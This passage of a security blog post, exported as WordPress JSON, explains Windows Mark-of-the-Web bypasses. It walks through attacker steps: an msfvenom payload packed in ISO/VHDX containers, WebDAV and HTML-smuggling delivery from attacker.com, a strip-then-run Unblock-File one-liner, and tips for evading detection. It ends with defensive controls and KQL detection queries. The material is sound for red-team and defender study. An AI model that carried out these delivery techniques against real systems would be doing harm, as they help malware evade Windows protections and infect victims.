TA577<\/td><td>ISO + DLL sideloading \u2014 DLL inside ISO had no MoTW<\/td><\/tr>\n        <tr><td>BumbleBee Loader<\/td><td>ISO + LNK combo \u2014 consistent MoTW evasion for loader delivery<\/td><\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n\n  <!-- SECTION 6 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">06 \/\/<\/span> Red Team Evasion Techniques<\/h2>\n\n  <div class=\"motw-box box-warn\">\n    <div class=\"motw-box-header\">\u26a0 AUTHORIZED USE ONLY<\/div>\n    <div class=\"motw-box-body\">\n      <p>The following techniques are documented for authorized red team engagements only.<\/p>\n      <p>All testing must be performed within the scope of a signed Rules of Engagement (ROE).<\/p>\n      <p>These techniques mirror real-world threat actor TTPs mapped to MITRE ATT&amp;CK T1553.005.<\/p>\n    <\/div>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.1 \u2014 ISO \/ IMG Container Delivery<\/h3>\n  <p>The most widely adopted MoTW bypass technique used in the wild. By delivering a payload inside an ISO disk image, the container receives MoTW but the contents when mounted via Windows Explorer do not. This completely removes Office Protected View and SmartScreen for files inside the ISO.<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>ISO Container Bypass \u2014 Full Workflow<\/span>\n    <\/div>\n    <pre>\n<span class=\"label\">ATTACKER WORKFLOW \u2014 ISO Container Bypass<\/span>\n\n1. Create payload:   msfvenom -p windows\/x64\/meterpreter\/reverse_https ...\n2. Create ISO:       mkisofs -o payload.iso payload.lnk\n   OR (Windows):     New-IsoFile -Path payload.lnk -Destination payload.iso\n3. Deliver via HTTP: victim downloads payload.iso  \u2190 MoTW applied to .iso\n4. Victim mounts:    Double-click ISO \u2192 mounts as drive letter (e.g. E:\\)\n\nRESULT: E:\\payload.lnk has NO Zone.Identifier stream\n        Windows Explorer shows no security warning\n        LNK executes payload without SmartScreen prompt\n\nPS&gt; Get-Item E:\\payload.lnk -Stream *\n<span class=\"comment\"># Only ::$DATA stream present \u2014 Zone.Identifier ABSENT<\/span><\/pre>\n  <\/div>\n\n  <div class=\"motw-box box-red\">\n    <div class=\"motw-box-header\">\u2694 RED TEAM USAGE \u2014 ISO BYPASS<\/div>\n    <div class=\"motw-box-body\">\n      <p>MITRE ATT&amp;CK: T1553.005 \u2014 Mark-of-the-Web Bypass<\/p>\n      <p>Payload options: LNK \u2192 PowerShell cradle, DLL sideloading, MSI installer, EXE<\/p>\n      <p>Tools: mkisofs (Linux), oscdimg.exe (Windows ADK), PowerShell New-ISOFile module<\/p>\n      <p>Pair with: HTML smuggling delivery (ISO downloaded via JS blob), phishing lure as invoice\/receipt<\/p>\n      <p>EDR note: Mounting ISO from Downloads generates process creation events, blend with signed binary<\/p>\n      <p>Best combo: ISO + LNK + LOLBin (mshta.exe, regsvr32.exe, wscript.exe) for clean execution chain<\/p>\n    <\/div>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.2 \u2014 VHD \/ VHDX Virtual Disk Delivery<\/h3>\n  <p>Virtual Hard Disk files behave identically to ISOs for MoTW purposes.  Windows mounts them as drive letters and does not propagate the Zone.Identifier to contained files. Slightly less common in the wild than ISO but equally effective.<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>PowerShell \u2014 Create VHDX Containing Payload<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Create a VHD containing payload (PowerShell)<\/span>\n$vhd = New-VHD -Path C:\\payload.vhdx -SizeBytes 50MB -Dynamic\nMount-VHD -Path C:\\payload.vhdx\n<span class=\"comment\"># Add payload files to mounted VHD drive letter<\/span>\nCopy-Item .\\payload.lnk 'E:\\'\nDismount-VHD -Path C:\\payload.vhdx\n\n<span class=\"comment\"># Result: payload.lnk inside VHDX has no Zone.Identifier when mounted<\/span><\/pre>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.3 \u2014 WebDAV \/ UNC Path Delivery<\/h3>\n  <p>Files accessed via UNC paths (<code>\\\\server\\share\\file.exe<\/code>) are treated as network share resources, not internet downloads. Windows does not apply MoTW to files accessed via SMB or WebDAV. This makes WebDAV-hosted payloads a reliable bypass when direct-download detection is high.<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>WebDAV Bypass \u2014 Attacker Infrastructure Setup<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Attacker side \u2014 serve files over WebDAV<\/span>\npip install wsgidav\nwsgidav --host=0.0.0.0 --port=80 --root=\/srv\/payloads --auth=anonymous\n\n<span class=\"comment\"># Phishing lure references UNC path in HTML smuggling or document<\/span>\n<span class=\"comment\"># \\\\attacker.com\\share\\payload.exe<\/span>\n\nRESULT: Files accessed via UNC\/WebDAV DO NOT receive MoTW\n        (UNC paths treated as network shares, not Internet downloads)\n\n<span class=\"comment\"># Delivery via HTML smuggling with UNC reference:<\/span>\n&lt;script&gt;\n  var link = document.createElement('a');\n  link.href = 'file:\/\/attacker.com\/share\/payload.exe';\n  link.click();\n&lt;\/script&gt;<\/pre>\n  <\/div>\n\n  <div class=\"motw-box box-red\">\n    <div class=\"motw-box-header\">\u2694 RED TEAM USAGE \u2014 WEBDAV BYPASS<\/div>\n    <div class=\"motw-box-body\">\n      <p>Requires: Target must be able to reach attacker&#8217;s WebDAV server (TCP 80\/443)<\/p>\n      <p>Tools: wsgidav (Python), Impacket smbserver.py, Metasploit auxiliary\/server\/webdav<\/p>\n      <p>OPSEC: Use HTTPS WebDAV (port 443) to blend with normal web traffic<\/p>\n      <p>Detection: Unusual WebDAV connections in proxy logs; net use events in Windows Security log<\/p>\n      <p>Pair with: Cobalt Strike Scripted Web Delivery (UNC delivery option)<\/p>\n    <\/div>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.4 \u2014 Container Propagation Reference<\/h3>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>Container MoTW Propagation Matrix<\/span>\n    <\/div>\n    <pre>\n  CONTAINER BYPASS COMPARISON\n  \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n  \u2502 Container Type   \u2502 MoTW on Cnt \u2502 MoTW Propagates to Files? \u2502\n  \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n  \u2502 .zip (standard)  \u2502     YES     \u2502 YES (Windows 11 22H2+)    \u2502\n  \u2502 .zip (old Win10) \u2502     YES     \u2502 NO  \u2190 bypass              \u2502\n  \u2502 .iso             \u2502     YES     \u2502 NO  \u2190 bypass              \u2502\n  \u2502 .img             \u2502     YES     \u2502 NO  \u2190 bypass              \u2502\n  \u2502 .vhd \/ .vhdx     \u2502     YES     \u2502 NO  \u2190 bypass              \u2502\n  \u2502 .7z              \u2502     YES     \u2502 NO  \u2190 bypass              \u2502\n  \u2502 .rar (WinRAR)    \u2502  SOMETIMES  \u2502 NO  \u2190 bypass (pre-patch)  \u2502\n  \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n  * Microsoft patched ZIP propagation in Win11 22H2 (Oct 2022)\n  * ISO\/VHD mounts via Windows Explorer never propagate MoTW<\/pre>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.5 \u2014 Stripping MoTW Post-Delivery<\/h3>\n  <p>If the payload has already landed on disk with MoTW applied, stripping the Zone.Identifier ADS before execution removes all downstream restrictions. This requires write access to the file and generates minimal log footprint.<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>PowerShell \u2014 Strip MoTW (ADS Removal)<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Strip MoTW from a file (requires access to filesystem)<\/span>\n\n<span class=\"comment\"># PowerShell \u2014 remove Zone.Identifier stream<\/span>\nUnblock-File -Path .\\payload.docm\n\n<span class=\"comment\"># Alternatively via streams<\/span>\nRemove-Item .\\payload.docm -Stream Zone.Identifier\n\n<span class=\"comment\"># CMD equivalent (copy to non-NTFS strips all ADS)<\/span>\nmore &lt; payload.docm &gt; clean_payload.docm\n\n<span class=\"comment\"># One-liner: strip then execute<\/span>\nUnblock-File $env:TEMP\\payload.exe; Start-Process $env:TEMP\\payload.exe\n\n<span class=\"comment\"># Verification \u2014 confirm MoTW is gone<\/span>\nGet-Item .\\payload.docm -Stream *\n<span class=\"comment\"># Should show ONLY ::$DATA \u2014 no Zone.Identifier<\/span><\/pre>\n  <\/div>\n\n  <div class=\"motw-box box-red\">\n    <div class=\"motw-box-header\">\u2694 RED TEAM USAGE \u2014 ADS STRIP<\/div>\n    <div class=\"motw-box-body\">\n      <p>Use case: Payload staged via download cradle to disk \u2014 strip before execution<\/p>\n      <p>OPSEC: Unblock-File generates no Windows event log by default, very low detection risk<\/p>\n      <p>Alternative: Copy to non-NTFS location (FAT32 USB, network share), ADS stripped automatically<\/p>\n      <p>EDR: Some EDR products hook ADS modification. Test in lab before deployment<\/p>\n    <\/div>\n  <\/div>\n\n  <h3 class=\"motw-h3 red\">6.6 \u2014 Malformed Authenticode (CVE-2023-24880 Class)<\/h3>\n  <p>A class of SmartScreen bypasses involves crafting PE files with malformed or specially structured Authenticode signatures. SmartScreen&#8217;s signature verification fails open for certain malformed states so the file passes the reputation check despite not having a valid trusted signature. Magniber ransomware exploited this pattern extensively before Microsoft&#8217;s patch in March 2023.<\/p>\n\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>Malformed Authenticode Bypass \u2014 Concept<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\"># Concept: Append junk data to Authenticode signature block<\/span>\n<span class=\"comment\"># SmartScreen fails to parse signature \u2192 skips reputation check<\/span>\n\n<span class=\"comment\"># SmartScreen reads Authenticode \u2192 parse error \u2192 defaults to 'signed' state<\/span>\n<span class=\"comment\"># MoTW is present (ZoneId=3) but SmartScreen skips cloud lookup<\/span>\n<span class=\"comment\"># Result: file executes without SmartScreen warning<\/span>\n\n<span class=\"comment\"># Patched in: KB5023706 (March 2023 Patch Tuesday)<\/span>\n<span class=\"comment\"># Unpatched systems: Windows 10 21H2 and earlier without March 2023 CU<\/span>\n\n<span class=\"comment\"># Tool: MSIX\/APPX packaging with invalid signature structure<\/span>\n<span class=\"comment\"># Tool: Custom PE manipulation (pefile Python library)<\/span><\/pre>\n  <\/div>\n\n  <!-- SECTION 7 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">07 \/\/<\/span> Detection &amp; Defense<\/h2>\n\n  <div class=\"motw-box box-green\">\n    <div class=\"motw-box-header\">\u2713 DEFENDER GUIDANCE<\/div>\n    <div class=\"motw-box-body\">\n      <p>The following controls significantly raise the cost of MoTW bypass for attackers.<\/p>\n      <p>Defense-in-depth is required. No single control covers all bypass variants.<\/p>\n      <p>Highest-value single control: disable ISO\/VHD auto-mount via Group Policy.<\/p>\n    <\/div>\n  <\/div>\n\n  <div class=\"motw-table-wrap\">\n    <table class=\"motw-table\">\n      <thead>\n        <tr>\n          <th>Defense Control<\/th>\n          <th>Mitigates<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr><td><strong>Disable ISO\/VHD auto-mount via Group Policy<\/strong><\/td><td>ISO\/VHD container bypass (most impactful single control)<\/td><\/tr>\n        <tr><td>ASR Rule: Block Office child processes<\/td><td>LNK\/macro execution post-MoTW bypass<\/td><\/tr>\n        <tr><td>ASR: Block untrusted\/unsigned processes from USB<\/td><td>USB-delivered payloads without MoTW<\/td><\/tr>\n        <tr><td>Enable Protected View for all zones (not just Zone 3)<\/td><td>MoTW-stripped Office documents<\/td><\/tr>\n        <tr><td>WDAC policy requiring signed executables<\/td><td>Unsigned payload execution regardless of MoTW<\/td><\/tr>\n        <tr><td>Block outbound WebDAV\/SMB at perimeter<\/td><td>UNC\/WebDAV payload delivery<\/td><\/tr>\n        <tr><td>MDE: Alert on Zone.Identifier ADS removal<\/td><td>Post-landing ADS strip attempts<\/td><\/tr>\n        <tr><td>Apply Patch Tuesday monthly (no exceptions)<\/td><td>CVE-class SmartScreen bypasses<\/td><\/tr>\n        <tr><td>Hunt: ISO\/VHD mounts from Downloads folder<\/td><td>Container-based delivery detection<\/td><\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n\n  <h3 class=\"motw-h3\">7.1 \u2014 KQL Detection Query (Microsoft Defender for Endpoint)<\/h3>\n  <div class=\"motw-code\">\n    <div class=\"motw-code-header\">\n      <div class=\"motw-code-dot dot-r\"><\/div>\n      <div class=\"motw-code-dot dot-y\"><\/div>\n      <div class=\"motw-code-dot dot-g\"><\/div>\n      <span>KQL \u2014 ISO Mount from Downloads + LNK Execution<\/span>\n    <\/div>\n    <pre>\n<span class=\"comment\">\/\/ Detect ISO\/VHD files mounted from user download locations<\/span>\nDeviceProcessEvents\n| where FileName =~ 'explorer.exe'\n| where ProcessCommandLine has_any ('.iso', '.img', '.vhd', '.vhdx')\n| where ProcessCommandLine has_any ('Downloads', 'Temp', 'AppData')\n| project Timestamp, DeviceName, AccountName, ProcessCommandLine\n| order by Timestamp desc\n\n<span class=\"comment\">\/\/ Hunt for LNK execution from mounted drive letters (non-C:)<\/span>\nDeviceProcessEvents\n| where InitiatingProcessFileName =~ 'explorer.exe'\n| where FolderPath matches regex @'^[D-Z]:\\\\'\n| where FileName has_any ('cmd.exe','powershell.exe','mshta.exe','wscript.exe')\n| project Timestamp, DeviceName, AccountName, FolderPath, FileName<\/pre>\n  <\/div>\n\n  <!-- SECTION 8 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">08 \/\/<\/span> MITRE ATT&amp;CK Mapping<\/h2>\n\n  <div class=\"motw-table-wrap\">\n    <table class=\"motw-table\">\n      <thead>\n        <tr>\n          <th style=\"width:160px\">Technique ID<\/th>\n          <th>Description<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr><td><span class=\"mitre-tag\">T1553.005<\/span><\/td><td>Subvert Trust Controls: Mark-of-the-Web Bypass<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1566.001<\/span><\/td><td>Phishing: Spearphishing Attachment (MoTW bypass delivery)<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1027.006<\/span><\/td><td>Obfuscated Files: HTML Smuggling (used for ISO delivery)<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1218.011<\/span><\/td><td>System Binary Proxy Execution: Rundll32 (post-bypass execution)<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1218.005<\/span><\/td><td>System Binary Proxy Execution: Mshta (post-bypass execution)<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1204.002<\/span><\/td><td>User Execution: Malicious File (victim mounts ISO, clicks LNK)<\/td><\/tr>\n        <tr><td><span class=\"mitre-tag\">T1140<\/span><\/td><td>Deobfuscate\/Decode Files (ADS strip post-landing)<\/td><\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n\n  <!-- SECTION 9 -->\n  <h2 class=\"motw-h2\"><span class=\"section-num\">09 \/\/<\/span> Conclusion<\/h2>\n\n  <p>Mark of the Web remains one of the most impactful and most abused security mechanisms in Windows. Its reliance on NTFS ADS creates inherent blind spots. Any container format that Windows mounts without propagating the stream is a potential bypass vector. The 2022 surge in ISO-based phishing campaigns was a direct consequence of this architectural limitation.<\/p>\n\n  <p>For red teams, MoTW bypass via ISO\/VHD delivery remains the most reliable and lowest-friction technique for bypassing Office Protected View and SmartScreen as of early 2026, particularly against unpatched or misconfigured endpoints. WebDAV delivery offers an alternative when container formats are monitored or blocked.<\/p>\n\n  <p>For defenders, the highest-value single control is <strong>disabling ISO\/VHD auto-mount via Group Policy<\/strong>, supplemented by Attack Surface Reduction rules and monthly patching. No bypass technique covered in this article survives a fully enforced WDAC policy requiring trusted code signing if your organization can deploy it, do so.<\/p>\n\n  <div class=\"motw-box box-blue\">\n    <div class=\"motw-box-header\">\ud83d\udccc KEY TAKEAWAYS<\/div>\n    <div class=\"motw-box-body\">\n      <p>MoTW lives in an NTFS ADS (Zone.Identifier) It only exists on NTFS volumes<\/p>\n      <p>ISO\/VHD mounts remain the most reliable MoTW bypass as of 2026<\/p>\n      <p>Unblock-File (PowerShell) strips MoTW silently with minimal log footprint<\/p>\n      <p>Defender priority: Disable ISO auto-mount + ASR rules + WDAC for full coverage<\/p>\n      <p>Every major threat actor delivering via phishing (Qakbot, Emotet, BumbleBee) abused MoTW<\/p>\n    <\/div>\n  <\/div>\n\n  <hr class=\"motw-divider\">\n\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>01 \/\/ What Is Mark of the Web? Mark of the Web is a Windows security feature that dates to Internet Explorer 6 and has&hellip; <a href=\"https:\/\/racrx.io\/?p=280\" class=\"apace-readmore-link\"><span class=\"screen-reader-text\">Mark of the Web (MoTW) Details<\/span>Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-280","post","type-post","status-publish","format-standard","hentry","category-red-team"],"_links":{"self":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=280"}],"version-history":[{"count":4,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/280\/revisions"}],"predecessor-version":[{"id":288,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/280\/revisions\/288"}],"wp:attachment":[{"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}